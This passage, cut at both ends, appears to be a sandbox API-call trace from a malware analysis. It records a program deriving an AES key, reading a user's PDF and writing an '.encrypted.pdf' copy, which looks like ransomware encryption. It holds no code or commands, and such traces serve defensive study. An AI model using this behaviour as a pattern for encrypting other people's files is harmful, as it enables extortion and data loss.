lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.697] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.697] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.698] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.698] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.698] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.698] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.698] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.698] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0034.698] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.698] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.698] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.698] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.698] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0034.698] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.698] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.698] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.698] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.698] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.698] CryptHashData (hHash=0x7c2100, pbData=0x7c97d8, dwDataLen=0x100, dwFlags=0x1) returned 1 [0034.698] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.698] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.698] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.698] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.698] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.698] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.699] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.699] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.699] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0034.699] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.699] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.699] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.699] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.699] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.700] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.700] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0034.700] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.700] CryptDestroyHash (hHash=0x7c2100) returned 1 [0034.700] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.700] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.700] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.700] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.700] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.700] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\oy9qr-e1terui8x.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.700] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.700] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0034.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0034.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0034.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0034.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0034.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0034.700] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0034.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0034.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0034.701] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0034.701] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0034.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0034.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0034.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0034.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x110) returned 0x7c9b70 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791268 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9b70 | out: hHeap=0x770000) returned 1 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0034.702] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw")) returned 0x10 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791268 | out: hHeap=0x770000) returned 1 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0034.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0034.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0034.702] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.encrypted.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\oy9qr-e1terui8x.encrypted.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0034.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0034.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0034.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0034.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0034.703] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0034.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0034.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0034.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0034.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0034.703] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0034.703] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0034.703] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0034.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0034.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0034.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0034.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0034.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0034.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0034.704] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0034.704] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x796e, lpOverlapped=0x0) returned 1 [0034.705] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0034.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0034.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x796e) returned 0x955018 [0034.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0034.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0034.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0034.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0034.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x796e) returned 0x95c990 [0034.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0034.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.709] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0034.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0034.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x796e) returned 0x955018 [0034.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0034.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0034.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.710] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0034.710] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.710] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0034.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.710] RtlAllocateHeap 